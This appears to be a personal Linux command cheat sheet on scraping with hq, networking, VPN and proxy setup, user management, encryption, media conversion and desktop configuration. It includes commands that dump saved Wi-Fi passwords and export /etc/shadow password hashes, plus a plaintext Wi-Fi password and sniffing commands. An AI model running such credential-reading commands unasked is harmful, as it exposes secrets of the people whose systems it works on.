curl https://www.w3schools.com/xml | hq '`title: ${/head/title}`'
cat index.html | hq '/html/body/table/tr/td[2]/a/text()'
# retrieve all classes
cat p1-utf8.txt | hq '/html/body/table//p/@class'
# retrieve all texts from 'p'
cat p1-utf8.txt | hq '/html/body/table//p/text()'
# retrieve all texts from 'p' with condition
cat p1-utf8.txt | hq '/html/body/table//p[@class="MsoNormal"]/text()'
# retrieve html tag table
cat p1-utf8.txt | hq '//table'

cat $filename | hq '`Hello, ${/html/head/title}!`'

# https://www.w3.org/TR/xquery-31/#id-flwor-expressions
hq -f $filename '
let $path := /html/body/ul/li[*];
for $el in $path
    let $title:=`${ $el/span/div/div/div/div[2]/div[3]/div/div[1]/div/div[1]/div[1]/h2 }`
    let $price1:=`${ $el/span/div/div/div/div[2]/div[3]/div/div[1]/div/div[1]/div[2]/div[1]/div/span/span[1] }`
    let $price2:=`${ $el/span/div/div/div/div[2]/div[3]/div/div[1]/div/div[1]/div[2]/div[2]/div/span[1]/span[1] }`

    let $price:=if ($price1) then $price1 else $price2

    return `$title | $price `'

hq -f $filename '
let $path := /html/body/div[1]/li[*];
for $el in $path
    return `${ $el/article/div[2]/div[2]/h2/a } | https://www.example.de/${ $el/a/@href }`'

network

ip address of the site show ip address of remote host ip address

host google.com
dig mail.ru

print all networks

ip -4 a
ip -6 a

print all network interfaces all wifi devices

interfaces
ifconfig
nmcli d

print all wifi passwords

sudo cat /etc/NetworkManager/system-connections/* | grep -e ^ssid -e ^psk

switch on and off network interface

sudo ifdown lo && sudo ifup lo

restart network, switch off all interfaces

sudo service network-manager restart

vpn connection, connect to network

# status of all connections
nmcli d
nmcli connection
nmcli connection up id {name from previous command}
nmcli connection down id {name of connection}

connect to wifi

wifi_code='188790542'
point="FRITZ!Box 7400 YO"
nmcli device wifi connect  "$point" password $wifi_code
# sudo cat /etc/NetworkManager/system-connections/*

raw vpn connection

sudo openconnect --no-proxy {ip-address} --user=$VPN_USER $URL_VPN
sudo openconnect --no-cert-check --no-proxy --user=$VPN_USER ---servercert $URL_VPN
openconnect $URL_VPN --interface=vpn0 --user=$(id -un) --authgroup=YubiKey+PIN -vv --no-proxy --no-dtls

FILE_CERT_CA=WLAN_CA.crt
FILE_USER_KEY=xxx.ubs.corp.key
FILE_USER_CERT=xxx.ubs.corp.crt
URL_VPN=https://vpn.ubs.com
USER_VPN=xxxyyyzzz
sudo openconnect --no-proxy --user=$USER_VPN --authgroup='YubiKey+PIN' --cafile=$FILE_CERT_CA --sslkey=$FILE_USER_KEY --certificate=$FILE_USER_CERT $URL_VPN	

openvpn vpn connection

# apt install network-manager-openvpn
sudo openvpn file_config.ovpn

# vpn-auth - text file with two lines: login and password
sudo openvpn --config 1.ovpn --auth-user-pass $DIR_PROJECT/vpn-auth.txt

ipv6

warning: can lead to "black screen" on ubuntu /etc/sysctl.d/60-ipv6-disable.conf

net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1

or

nmcli con show # select target network
nmcli con show 'target-network'

## disable/diactivate ivp6
# nmcli con modify 'target-network' ipv6.method disabled
# nmcli con modify 'target-network' ipv6.method ignore
# sudo sysctl -w net.ipv6.conf.all.disable_ipv6=1

## enable/activate  ivp6
nmcli con show 'target-network'
nmcli con modify 'target-network' ipv6.method auto
sudo sysctl -w net.ipv6.conf.all.disable_ipv6=0
nmcli con show 'target-network' | grep ipv6.method

## apply settings
sudo systemctl restart NetworkManager

debug network collaboration, ip packages

example with reading redis collaboration ( package sniffer )

sudo ngrep -W byline -d docker0 -t '' 'port 6379'

debug connection, print collaboration with remote service, sniffer

#                    1------------     2--------------------     3--------------
sudo tcpdump -nvX -v src port 6443 and src host 10.140.26.10 and dst port not 22
# and, or, not

keystore TrustStore

TrustStore holds the certificates of external systems that you trust.
So a TrustStore is a KeyStore file, that contains the public keys/certificate of external hosts that you trust.

## list of certificates inside truststore 
keytool -list -v -keystore ./src/main/resources/com/ubs/crm/data/api/rest/server/keystore_server
# maybe will ask for a password

## generating ssl key stores
keytool -genkeypair -keystore -keystore ./src/main/resources/com/ubs/crm/data/api/rest/server/keystore_server -alias serverKey -dname "CN=localhost, OU=AD, O=UBS AG, L=Zurich, ST=Bavaria, C=DE" -keyalg RSA
# enter password...

## Importing ( updating, adding ) trusted SSL certificates
keytool -import -file ~/Downloads/certificate.crt -keystore ./src/main/resources/com/ubs/crm/data/api/rest/server/keystore_server -alias my-magic-number

in other words, rsa certificate rsa from url x509 url:

  1. Download the certificate by opening the url in the browser and downloading it there manually.
  2. Run the following command: keytool -import -file <name-of-downloaded-certificate>.crt -alias <alias for exported file> -keystore myTrustStore

DNS

# check 
sudo resolvectl status | grep "DNS Servers"
systemd-resolve --status
systemctl status systemd-resolved

# restart
sudo systemctl restart systemd-resolved

# current dns
sudo cat /etc/resolv.conf
# resolving hostname
dig google.com

aws example, where 10.0.0.2 AWS DNS internal server sudo vim /etc/resolv.conf

# nameserver 127.0.0.53
nameserver 10.0.0.2
options edns0 trust-ad
search ec2.internal

proxy

proxy local, proxy for user /etc/profile.d/proxy.sh

export HTTP_PROXY=http://webproxy.host:3128
export http_proxy=http://webproxy.host:3128
export HTTPS_PROXY=http://webproxy.host:3128
export https_proxy=http://webproxy.host:3128
export NO_PROXY="localhost,127.0.0.1,.host,.viola.local"
export no_proxy="localhost,127.0.0.1,.host,.viola.local"

global proxy, proxy global, system proxy, proxy system /etc/apt/apt.conf

Acquire::http::proxy "http://proxy.company.com:80/";
Acquire::https::proxy "https://proxy.company.com:80/";
Acquire::ftp::proxy "ftp://proxy.company.com:80/";
Acquire::socks5::proxy "socks://127.0.0.1:1080/";

global proxy, proxy global, system proxy, proxy system /etc/environment

http_proxy=http://webproxy.host:3128
no_proxy="localhost,127.0.0.1,.host.de,.viola.local"

for application

create environment for http

sudo gedit /etc/systemd/system/{service name}.service.d/http-proxy.conf

[Service]
Environment="http_proxy=http://user:[email protected]:8080"

create environment for https

sudo gedit /etc/systemd/system/{service name}.service.d/https-proxy.conf
[Service]
Environment="https_proxy=http://user:[email protected]:8080"

service list of services

systemctl list-unit-files --type=service

restart service restart service stop service start

$ sudo systemctl daemon-reload
$ sudo systemctl restart {service name}
# or
sudo service {service name} stop
sudo service {service name} start

check service status

sudo systemctl is-active {service name}

enable automatic start disable autostart disable service

sudo systemctl enable {service name}
sudo systemctl disable {service name}

service check logs

systemctl status {service name}
journalctl -u {service name} -e
# print all units
journalctl -F _SYSTEMD_UNIT

# system log
journalctl -f -l 
# system log for app log
$ journalctl -f -l -u python -u mariadb
# system log since 300 second
$ journalctl -f -l -u httpd -u mariadb --since -300

check settings

systemctl show {service name} | grep proxy

for snapd

# export SYSTEM_EDITOR="vim"
# export SYSTEMD_EDITOR="vim"
sudo systemctl edit snapd.service
# will edit: /etc/systemd/system/snapd.service.d/override.conf

add next lines

[Service]
Environment=http_proxy=http://proxy:port
Environment=https_proxy=http://proxy:port

restart service

sudo systemctl daemon-reload
sudo systemctl restart snapd.service

snap proxy settings

sudo snap set system proxy.http="http://user:[email protected]:8080"
sudo snap set system proxy.https="http://user:[email protected]:8080"
export proxy_http="http://user:[email protected]:8080"
export proxy_https="http://user:[email protected]:8080"
sudo snap search visual 

users/group

add user into special group, add user to group

  • adduser {username} {destination group name}
  • edit file /etc/group
add :{username} to the end of line with {groupname}:x:999

create/add user, create user with admin rights

sudo useradd test

sudo useradd --create-home test --groups sudo 
# set password for new user
sudo passwd test
# set default bash shell 
chsh --shell /bin/bash tecmint

sudo for user, user sudo, temporary provide sudo

sudo adduser vitalii sudo
# close all opened sessions
# after your work done
sudo deluser vitalii sudo

admin rights for script, sudo rights for script, execute as root

sudo -E bash -c 'python3'

remove user

sudo userdel -r test

create group, assign user to group, user check group, user group user roles hadoop

sudo groupadd new_group
usermod --append --groups new_group my_user
id my_user

create folder for group, assign group to folder

chgrp new_group /path/to/folder

execute sudo with current env variables, sudo env var, sudo with proxy

sudo -E <command>

execute script with current env variables send to script

. ./airflow-get-log.sh
source ./airflow-get-log.sh
cat dag-runs-failed.id | . ./airflow-get-log.sh

print all logged in users, active users, connected users

users
w
who --all

send message to user, message for other users

write <username> <message>
sudo wall -n 'hello all logged in users '

print all users registered users into system

cat /etc/passwd | cut --delimiter=: --fields=1

copy users, import/export users

sudo awk -F: '($3>=LIMIT) && ($3!=65534)' /etc/passwd > passwd-export
sudo awk -F: '($3>=LIMIT) && ($3!=65534)' /etc/group > /opt/group-export
sudo awk -F: '($3>=LIMIT) && ($3!=65534) {print $1}' /etc/passwd | tee - | egrep -f - /etc/shadow > /opt/shadow-export
sudo cp /etc/gshadow /opt/gshadow-export

issue with ssh, ssh connection issue

when you see message:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

use this:

ssh-keygen -R <host>

or

rm ~/.ssh/known_hosts

tools

virtual machines

mapping keys, keymap, assign actions to key

show key codes

xmodmap -pke
# or take a look into "keycode ... " 
xev 

remap key 'Druck' to 'Win'

xmodmap -e "keycode 107 = Super_L"

to reset

setxkbmap

make ctrl+alt the same as alt+ctrl, make ctrl+shift the same as shift+ctrl

keycode 50 = Shift_L NoSymbol Shift_L
keycode 62 = Shift_R NoSymbol Shift_R
keycode 37 = Control_L NoSymbol Control_L
keycode 105 = Control_R NoSymbol Control_R

keycode 64 = Alt_L Meta_L Alt_L Meta_L
keycode 108 = Alt_R Meta_R Alt_R Meta_R
keycode 37 = Control_L NoSymbol Control_L
keycode 105 = Control_R NoSymbol Control_R

save to use during each reboot

echo "keycode 107 = Super_L" >> ~/.Xmodmap
echo "xmodmap ~/.Xmodmap" >> ~/.xprofile

find key code

xev | grep keysym

key code, scan code, keyboard code

sudo evtest 
sudo evtest /dev/input/event21

remap [hjkl] to [Left, Down, Up, Right], cursor hjkl: option 2

mapping list
for using in VisualCode like environment: GTK_IM_MODULE="xim" code $* content of $HOME/.config/xmodmap-hjkl

keycode 66 = Mode_switch
keysym h = h H Left 
keysym l = l L Right
keysym k = k K Up
keysym j = j J Down
keysym u = u U Home
keysym m = m M End
keysym y = y Y BackSpace
keysym n = n N Delete

execute re-mapping, permanent solution

# vim /etc/profile
xmodmap $HOME/.config/xmodmap-hjkl

remap reset, reset xmodmap

setxkbmap -option

move mouse, control X server

apt-get install xdotool
# move the mouse  x    y
xdotool mousemove 1800 500
# left click
xdotool click 1

pls, check that you are using Xorg and not Wayland (Window system):

# uncomment false
cat /etc/gdm3/custom.conf | grep WaylandEnable

how to check your current display server(window system):

# x11 - xorg
# wayland
echo $XDG_SESSION_TYPE

another possible solution for moving mouse cursor

apt-get install xautomation
xte 'mousemove 200 200'

another possible solution for moving mouse cursor

terminal title

set-title(){
  ORIG=$PS1
  TITLE="\e]2;$@\a"
  PS1=${ORIG}${TITLE}
}

set-title "my title for terminal"

code/decode

encrypt decrypt

encrypt file, decrypt file, encode/decode

gpg --symmetric {filename}
gpg --decrypt {filename}
# encrypt
# openssl [encryption type] -in [original] -out [output file]
openssl des3 -in original.txt -out original.txt.encrypted
# decrypt
# openssl [encryption type] -d -in [encrypted file] -out [original file]
openssl des3 -d -in original.txt.encrypted -out original.txt

# list of encryptors (des3):
openssl enc -list

encrypt decrypt

sudo apt install ccrypt
# encrypt file
ccencrypt file1.txt
# ccencrypt file1.txt --key mysecretkey
# print decrypted content
ccat file1.txt.cpt
# decrypt file
ccdecrypt file1.txt.cpt
# ccdecrypt file1.txt.cpt --key mysecretkey
# try to guess password
# ccguess file1.txt.xpt

base64

# !!! important !!! will produce line with suffix "\n" 
base64 cAdvisor-start.sh | base64 --decode
echo "just a text string" | base64 | base64 --decode

# !!! important !!! will produce line WITHOUT suffix "\n" 
echo -n "just a text string " | base64 
printf "just a text string " | base64 

md5 digest

md5sum filename
# check control sum 
echo "$(cat $filename) $filename" | md5sum -c

sha224sum filename
echo -n foobar | sha256sum
sha384sum filename
sha512sum filename

check pgp signature check control sum

sig_file=`ls ~/Downloads/*.sig`
original_file="${sig_file%.sig}"
gpg --verify $sig_file $original_file

check open pgp signature

# tails-amd64-5.22.img   tails-amd64-5.22.img.sig   tails-signing.key
gpg --import tails-signing.key
gpg --verify tails-amd64-5.22.img.sig tails-amd64-5.22.img

driver install hardware

sudo ubuntu-drivers autoinstall
reboot

hardware serial numbers, hardware id, hardware version, system info

sudo dmidecode --string system-serial-number
sudo dmidecode --string processor-family
sudo dmidecode --string system-manufacturer
# disk serial number
sudo lshw -class disk

equipment system devices

inxi -C
inxi --memory
inxi -CfxCa

images

convert image like png or gif or jpeg... to jpg, transform image from one format to another

# sudo apt-get install imagemagick
convert input.png output.jpg
convert input.png -crop $WIDTHx$HEIGHT+$X+$Y output.jpg
convert input.png -resize 50% output.jpg
convert input.png -quality 75 output.jpg
convert input.png -background white -flatten output.jpg

convert image to vector graphics

# sudo apt-get install potrace
INPUT_IMAGE=strategy-Decision-de-centralized.jpg
OUTPUT_IMAGE=$INPUT_IMAGE".pgm"
convert $INPUT_IMAGE -depth 8 -colorspace Gray -format pgm $OUTPUT_IMAGE

rifle $OUTPUT_IMAGE
potrace $OUTPUT_IMAGE -s

convert text to image

# list of all fonts: `fc-list`
# transparent background: xc:none
convert -size 800x600     xc:white -font "Garuda" -pointsize 20 -fill black -annotate +50+50 "some text\n and more \n lines" $OUTPUT_FILE

insert image into another image, image composition

convert input_image.jpg output_image.png -composite overlay_image.png -gravity center
convert input_image.jpg output_image.png -composite overlay_image.png -geometry 50%x50%+0+0

qr, bar-codes

qr code online generator

http://goqr.me/api/doc/create-qr-code/
http://api.qrserver.com/v1/create-qr-code/?data=HelloWorld!&size=100x100
https://qr-creator.com/url.php
https://qrgenerator.org/

qr code generator

# generate qrcode
# sudo apt install qrencode
qrencode --size 6 --level H --output="test-text.png" "test text"
echo "output from pipe" | qrencode --size 6 --level H --output="test-text.png" 

bar code scanner qr code scanner

# bar code scanner QR code scanner
sudo apt install zbar-tools
zbarimg ~/path-to-screenshot-of-barcode.png

bar code finder

apt install zbar-tool
zbarimg <file>

barcode - for pdf only

pdf

convert pdf to image

FILE_SOURCE="certificate_Vitalii.pdf"
pdftoppm -png $FILE_SOURCE  $FILE_SOURCE
# pdftoppm -mono -jpeg $FILE_SOURCE $FILE_SOURCE

# tesseract $FILE_SOURCE-1.png - -l eng
convert -geometry 400x600 -density 100x100 -quality 100 test-pdf.pdf test-pdf.jpg

bar code create into pdf

barcode -o 1112.pdf -e "code39" -b "1112" -u "mm" -g 50x50

pdf watermark, merge pdf files into one

pdftk original.pdf stamp watermark.pdf output output.pdf

pdf file merge, pdf join

# -dAutoRotatePages=/None 
gs -dBATCH -dNOPAUSE -q -sDEVICE=pdfwrite -sOutputFile=finished.pdf test-pdf2.pdf test-pdf3.pdf test-pdf4.pdf
rm finished.pdf; gs -dBATCH -dNOPAUSE -q -sDEVICE=pdfwrite -sOutputFile=finished.pdf -dDEVICEWIDTH=612 -dDEVICEHEIGHT=792 *.pdf
rm finished.pdf; gs -dBATCH -dNOPAUSE -q -sDEVICE=pdfwrite -sOutputFile=finished.pdf -dDEVICEWIDTH=612 -dDEVICEHEIGHT=792 -dPAGEWIDTH=612 -dPAGEHEIGHT=792 -dFIXEDMEDIA *.pdf

for each_file in `*.pdf`; do
    gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile="$each_file-resized" "$each_file"
done

rm finished.pdf; pdftk *.pdf cat output finished.pdf

pdf file decrease size pdf compression

# -dPDFSETTINGS=/screen — Low quality and small size at 72dpi.
# -dPDFSETTINGS=/ebook — Slightly better quality but also a larger file size at 150dpi.
# -dPDFSETTINGS=/prepress — High quality and large size at 300 dpi.
# -dPDFSETTINGS=/default — System chooses the best output, which can create larger PDF files.

gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile=output.pdf input.pdf

doc to pdf, convert to pdf

libreoffice --headless --convert-to pdf "/home/path/Dativ.doc" --outdir /tmp/output

pdf to text, extract text from pdf, convert pdf to text

pdftotext file.pdf -

epub to pdf

apt install calibre
ebook-convert input.epub output.pdf

zip

unzip bz2

bzip2 -dc ricochet-1.1.4-src.tar.bz2 | tar xvf -

gzip unzip gzip decompress

gzip -d out.gz
# unknown suffix -- ignored
# add "gz" suffix to file

console and clipboard

alias clipboard="xclip -selection clipboard" 
alias clipboard-ingest="xclip -selection clipboard"
function clipboard-copy-file(){
    xclip -in -selection c $1
}
alias clipboard-print="xclip -out -selection clipboard"

screenshot, copy screen

screenshot(){
	file_name="/home/user/Pictures/screenshots/screenshot_"`date +%Y%m%d_%H%M%S`".png"
	scrot $file_name -s -e "xdg-open $file_name"
}

printer managing ( add/remote/edit )

in case of authorization issue:

/etc/cups/cupsd.conf and changed the AuthType to None and commented the Require user @SYSTEM:

<Limit CUPS-Add-Modify-Printer CUPS-Delete-Printer CUPS-Add-Modify-Class CUPS-Delete-Class CUPS-Set-Default CUPS-Get-Devices>
AuthType None
# AuthType Default
# Require user @SYSTEM
Order deny,allow
</Limit>

and restart the service

sudo service cups restart

default printer

# show all printer drivers in system
lpinfo -m

# print all printer names
lpstat -l -v
# device for Brother_HL_L8260CDW_series: implicitclass://Brother_HL_L8260CDW_series/

# set default printer
PRINTER_NAME=Brother_HL_L8260CDW_series
sudo lpadmin -d $PRINTER_NAME

printer queue

lpq -P 

print to printer

lpr -P $PRINTER_NAME myfile.txt
lpr -P $PRINTER_NAME -o fit-to-page=false -o position=top $out_file

kernel related messages

dmesg --level=err,warn
dmesg --follow
# save all messages /var/log/dmesg
dmesg -S

disk usage

df -ha
# with visualization
ncdu

create startup disk, write iso image, usb stick, bootable drive, restore disk image

default ubuntu disk startup disk creator

for CD iso images

usb-creator-gtk

startup/bootable usb disk

for LIVE images

# list of all hard drives, disk list
sudo lshw -class disk -short
# write image
sudo dd bs=4M if=/home/my-user/Downloads/archlinux-2019.07.01-x86_64.iso of=/dev/sdb status=progress && sync

startup/bootable usb with persistence, create usb live with persistence, usb persistence, stick persistence

for parallel disk solution Parrot is highly recommended ( good bootloader )

sudo add-apt-repository universe
sudo add-apt-repository ppa:mkusb/ppa
sudo apt-get update
sudo apt install --install-recommends mkusb mkusb-nox usb-pack-efi

# https://parrotsec.org/download/
wget https://deb.parrot.sh/parrot/iso/6.0/Parrot-home-6.0_amd64.iso; cd ~/Downloads
mkusb Parrot-home-6.0_amd64.iso
# Install, persistent live, uefi
# steps: p(persistent), p(dus-Persistent)

split usb drive, split disk

# detect disks
sudo lshw -class disk -short
sudo fdisk -l

# format drive
DEST_DRIVE=/dev/sdb
sudo dd if=/dev/zero of=$DEST_DRIVE  bs=512  count=1
# sudo mke2fs -t xfs $DEST_DRIVE

# split drive, split disk, split usb
sudo parted $DEST_DRIVE
print
rm 1
rm 2

mklabel kali
msdos

mkpart primary ext4 0.0 5GB
I

mkpart extended ntfs 5GB -1s

print 
set 1 boot on
set 2 lba on
quit
sudo fdisk -l

time command resource consumption command exec information

\time -v date

command time consumption

time curl google.com

elapsed time between two commands

STARTTIME=$SECONDS
sleep 2
echo $SECONDS-$STARTTIME
STARTTIME=`date +%s.%N`
sleep 2.5
ENDTIME=`date +%s.%N`
TIMEDIFF=`echo "$ENDTIME - $STARTTIME" | bc | awk -F"." '{print $1"."substr($2,1,3)}'`

language translator

sudo apt-get install translate-shell
trans -source de -target ru -brief "german sentance"

gnome

remove emoji

ibus-setup
# go to emojii and remove shortcuts

video

join mp4 fusion mp4

ffmpeg -i video.mp4 -i audio.mp4 output.mp4

join images to mp4, convert images to video

# in the current folder there are JPEG files in proper order
ffmpeg -framerate 0.5 -pattern_type glob -i "*.jpeg" output.mp4

convert webm video to mp3

FILE_INPUT=video.webm
FILE_OUTPUT=audio.mp3
ffmpeg -i $FILE_INPUT -vn -ab 64k -ar 44100 -y $FILE_OUTPUT

convert mp4 to mp3 with slow playing

file_input="Cybercity.mp4"
file_output="Cybercity.mp3"
ffmpeg -i $file_input -vn -acodec libmp3lame -q:a 4 -filter:a "atempo=0.75 "$file_output

sound

join files

sox 1.wav 2.wav 3.wav 4.wav output.wav
ffmpeg -i 1.wav -i 2.wav -i 3.wav output.wav

split mp3 files

mp3splt -s -p nt=10 album.mp3

speach to text

text to speach, text to voice

## more or less
sudo apt install libttspico-utils
pico2wave -w output.wav "this is text-to-speech conversion"; rifle output.wav

# too metallic 
sudo apt install espeak
espeak -w output.wav "Just a text"

## also too metallic
sudo apt install festival
echo "This is text saved as audio." | text2wave -o output.wav; rifle output.wav

calculator arithmethic operations add sub div multiply evaluation

expr 30 / 5
myvar=$(expr 1 + 1)
python3 -c "print(4*3)"
perl -e "print 4*3"

desc calculator

echo "2 3 + p" | dc

basic calculator

echo "4+5" | bc
bc <<< 4+5

interactive calculator

bc -l -i

interactive arithmethic calculator

calc
qalc

shell examples

byobu

sudo apt install byobu

LD Library

extend path and check it

# /snap/core20/2434/usr/lib/x86_64-linux-gnu/libssl.so.1.1
export LD_LIBRARY_PATH=/snap/core20/2434/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

ldconfig -p | grep libssl

Issues

issue with go package installation

>pkg-config --cflags  -- devmapper
Package devmapper was not found in the pkg-config search path.
Perhaps you should add the directory containing `devmapper.pc'
to the PKG_CONFIG_PATH environment variable
No package 'devmapper' found
sudo apt install libdevmapper-dev
export PKG_CONFIG_PATH=`echo $(pkg-config --variable pc_path pkg-config)${PKG_CONFIG_PATH:+:}${PKG_CONFIG_PATH}`

Linux devices

install drivers, update drivers ubuntu

sudo ubuntu-drivers autoinstall

zbook nvidia hp zbook hp nvidia

sudo prime select query
# should be nvidia
sudo ubuntu-drivers devices
# sudo ubuntu-drivers autoinstall - don't use it
sudo apt install nvidia driver-455
# or 390, 415, .... and restart

apple keyboard, alternative

echo 'options hid_apple fnmode=2 iso_layout=0 swap_opt_cmd=0' | sudo tee /etc/modprobe.d/hid_apple.conf
sudo update-initramfs -u -k all

video camera, camera settings, webcam setup

# camera utils installation
sudo apt install v4l-utils
sudo apt install qv4l2
# list of devices
v4l2-ctl --list-devices
# list of settings
v4l2-ctl -d /dev/video0 --list-ctrls

camera settings example

# /etc/udev/rules.d/99-logitech-default-zoom.rules
SUBSYSTEM=="video4linux", KERNEL=="video[0-9]*", ATTRS{product}=="HD Pro Webcam C920", ATTRS{serial}=="BBBBFFFF", RUN="/usr/bin/v4l2-ctl -d $devnode --set-ctrl=zoom_absolute=170"

wacom tablet, wacom graphical tablet, map wacom, map tablet, tablet to display

your wacom device has two modes - PC/Android, for switching between them - press and keep for 3-4 sec two outermost buttons.

# detect your monitors and select one of the output like 'HDMI-1'
xrandr --listmonitors

# detect all wacom devices
# xsetwacom --list devices
xinput | grep -i wacom | awk -F 'id=' '{print $2}' | awk '{print $1}' | while read each_input_device
do
	# xsetwacom set 21 MapToOutput 2560x1440+1080+0
	xinput map-to-output $each_input_device HDMI-1
done

external monitor settings, external screen, external display

#!/bin/sh
xrandr --output $1
xrandr --output $2 --auto --right-of $1
xrandr --output $3 --auto --right-of $2
xrandr | grep " connected" | awk '{print $1}'
 ./monitor.sh "DP-4" "DP-1-3" "eDP-1-1"

or just install 'arandr' and generate bash script

sudo apt install arandr

bluetooth

# connect and disconnect headphones
bluetoothctl connect 00:18:09:EC:BE:FD
bluetoothctl disconnect 00:18:09:EC:BE:FD
# for manual 
sudo apt install bluez-tools
bt-device --list
bt-device --disconnect 00:18:09:EC:BE:FD
bt-device --connect 00:18:09:EC:BE:FD

output audio device, sound card, headphones

# list of all outputs
pacmd list-sinks | grep -A 1 index
# set default output as
pacmd set-default-sink 16
pacmd set-default-sink bluez_sink.00_18_09_EC_BE_FD.a2dp_sink

# list of input devices
pacmd list-sources | grep -A 1 index
# set default input device
pacmd set-default-source 6
pacmd set-default-source alsa_input.pci-0000_00_1f.3-platform-skl_hda_dsp_generic.HiFi__hw_sofhdadsp_6__source

# mute microphone mute source
pacmd set-source-mute alsa_input.pci-0000_00_1f.3-platform-skl_hda_dsp_generic.HiFi__hw_sofhdadsp_6__source true
# unmute microphone unmute source
pacmd set-source-mute alsa_input.pci-0000_00_1f.3-platform-skl_hda_dsp_generic.HiFi__hw_sofhdadsp_6__source false

control mouse from keyboard

sudo apt-get install keynav
killall keynav 
cp /usr/share/doc/keynav/keynavrc ~/.keynavrc
keynav ~/.keynavrc

example of custom configfile

clear
daemonize
Super+j start,cursorzoom 400 400
Escape end
shift+j cut-left
shift+k cut-down
shift+i cut-up
shift+l cut-right
j move-left
k move-down
i move-up
l move-right
space warp,click 1,end
Return warp,click 1,end
1 click 1
2 click 2
3 click 3
w windowzoom
c cursorzoom 400 400
a history-back
Left move-left 10
Down move-down 10
Up move-up 10
Right move-right 10

Touch screen

calibration

tool installation

sudo apt install xinput-calibrator

configuration

xinput_calibration

list of all devices, device list, list of devices

xinput --list
cat /proc/bus/input/devices

permanent applying

vi /usr/share/X11/xorg.conf.d/80-touch.conf

disable device

xinput --disable {number from command --list}

Keyboard Lenovo

middle button

# check input source - use name(s) for next command
xinput
# create file and add content
sudo vim /usr/share/X11/xorg.conf.d/50-thinkpad.conf
Section "InputClass"
    Identifier  "Trackpoint Wheel Emulation"
    MatchProduct    "Lenovo ThinkPad Compact USB Keyboard with TrackPoint|ThinkPad Extra Buttons"
    MatchDevicePath "/dev/input/event*"
    Option      "EmulateWheel"      "true"
    Option      "EmulateWheelButton"    "2"
    Option      "Emulate3Buttons"   "false"
    Option      "XAxisMapping"      "6 7"
    Option      "YAxisMapping"      "4 5"
EndSection

recover usb drive

sudo fdisk -l
sudo lsblk
sudo fsck /dev/sdb
e2fsck -b 32768 /dev/sdb
sudo e2fsck -b 32768 /dev/sdb
sudo dd if=/dev/zero of=/dev/sdb
sudo fdisk /dev/sdb
sudo partprobe -s
sudo mkfs.vfat -F 32 /dev/sdb
sudo dd if=/dev/zero of=/dev/sdb bs=512 count=1
sudo fdisk /dev/sdb

home automation

DTMF generator

sox -n dtmf-1.wav synth 0.1 sine 697 sine 1209 channels 1
sox -n dtmf-2.wav synth 0.1 sine 697 sine 1336 channels 1
sox -n dtmf-3.wav synth 0.1 sine 697 sine 1477 channels 1

Linux applications

useful links:

XMind.ini: -vm /home/user/.sdkman/candidates/java/8.0.222-zulu/bin/java

echo $XDG_CONFIG_DIRS
locate rc.lua
# place for mouse pointer, cursor, theme
/usr/share/icons

gnome settings

gnome settings configuration customization adjuster

sudo apt install dconf-editor

examples of suppressing: monitor mode switch, show desktop

dconf-editor
# /org/gnome/mutter/keybindings/switch-monitor
# /org/gnome/desktop/wm/keybindings/show-desktop

manually can be achieved via

~/.local/share/gnome-shell/extensions/<extension-identifier>/prefs.js
~/.local/share/gnome-shell/extensions/<extension-identifier>/settings.js

remove HP default display mode switching

dconf-editor
# /org/gnome/mutter/keybindings/switch-monitor
# ['<Super>p', 'XF86Display']
# replace to
# []

gnome list of settings

# all gnome settings
gsettings list-recursively 
# one settings
org.gnome.desktop.background picture-uri

reset Gnome to default

rm -rf .gnome .gnome2 .gconf .gconfd .metacity .cache .dbus .dmrc .mission-control .thumbnails ~/.config/dconf/user ~.compiz*

restart Gnome shell

alt-F2 r

gnome application icon

ls /usr/share/applications/*.desktop
cat /usr/share/applications/usb-creator-gtk.desktop

adjust Gnome desktop shortcuts, gnome shortcuts

dconf-editor

gnome keybinding

/org/gnome/desktop/wm/keybindings

save/restore

# dconf dump /org/gnome/desktop/wm/keybindings/ > org_gnome_desktop_wm_keybindings
dconf dump /org/gnome/settings-daemon/plugins/media-keys/custom-keybindings/custom0/ > org_gnome_settings-daemon_plugins_media-keys_custom-keybindings_custom0

# dconf load /org/gnome/desktop/wm/keybindings/ < org_gnome_desktop_wm_keybindings
dconf load /org/gnome/settings-daemon/plugins/media-keys/custom-keybindings/custom0/ < org_gnome_settings-daemon_plugins_media-keys_custom-keybindings_custom0

alternative way to get/set settings

gsettings list-schemas
gsettings list-keys org.gnome.desktop.wm.keybindings
gsettings get org.gnome.desktop.wm.keybindings close
gsettings set org.gnome.desktop.wm.keybindings close "['<Super>w']"

find shortcuts in the settings

## for suppressing Super + P 
gsettings list-recursively | grep "<Super>p"

# UI tool: dconf-editor
gsettings set org.gnome.mutter.keybindings switch-monitor "['XF86Display']"
gsettings set org.gnome.mutter.keybindings switch-monitor "['']"

gsettings reset org.gnome.mutter.keybindings switch-monitor

windows information, window control

https://www.freedesktop.org/wiki/Software/wmctrl/ http://mirrors.kernel.org/ubuntu/pool/universe/w/wmctrl/wmctrl_1.07-7build1_amd64.deb

# get current window id
CURRENT_WINDOW_ID=$(xprop -root | grep "_NET_ACTIVE_WINDOW(WINDOW)" | cut -d ' ' -f 5)
echo "Window ID: $CURRENT_WINDOW_ID, Border Width: $BORDER_WIDTH"
# get window properties 
xprop -id $CURRENT_WINDOW_ID _NET_FRAME_EXTENTS

custom shortcuts script for finding and activating window, simulate actions by human

for windows customization(change position, size, title ... ): https://www.nongnu.org/devilspie2/ (https://github.com/dsalt/devilspie2)

#!/bin/bash
values=`xdotool search --name 'Visual Studio Code'`
# xdotool getwindowname 75497476
if [[ $? > 0 ]]; then
		  /usr/bin/code &> /dev/null &
	else
    xdotool windowactivate `echo $values | grep '' | awk '{print $1}' | head -n 1`
fi

gnome extension manual installation, gnome ext folder

install gnome extension

gnome-shell --version
